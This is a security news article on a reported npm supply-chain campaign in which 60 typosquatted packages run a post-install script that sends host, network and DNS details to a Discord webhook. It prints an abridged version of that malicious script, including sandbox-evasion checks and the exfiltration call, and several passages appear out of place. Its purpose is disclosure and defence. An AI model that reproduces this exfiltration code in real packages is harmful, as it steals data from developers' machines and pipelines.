Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames, IPs, DNS data, and user paths via Discord webhooks...

Continue reading
A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines.
The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors.
Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000.
The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence: ```javascript const os = require("os"); const dns = require("dns"); const https = require("https");
// Collect internal IPs and hostnames function getIPAddress() { const networkInterfaces = os.networkInterfaces(); // ... iterates NICs to find non-internal IPv4 addresses }
// Fetch external IP and ISP details via ipinfo.io function getExternalIP(cb) { https.get('https://ipinfo.io/json', (res) => { ... }); }
// Evade sandboxes if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) { return; }
// Exfiltrate to Discord const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/..."; https.request(webhookURL, ...).write(trackingData); ```
The script avoids analysis environments by checking:
| npm Account | Packages (20 each) |
|---|---|
| `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` |
| `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` |
| `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` |
Full list of 60 packages available in Appendix.
| Tactic | Technique | Details |
|---|---|---|
| Initial Access | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. |
| Execution | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. |
| Exfiltration | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. |
| Reconnaissance | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. |
Socket’s Threat Research Team: > _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_
> _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_
npm ls --all # Check nested dependencies Cross-reference projects against the IoCs list.
npm config set ignore-scripts true 
A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.
| Defense Evasion | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. |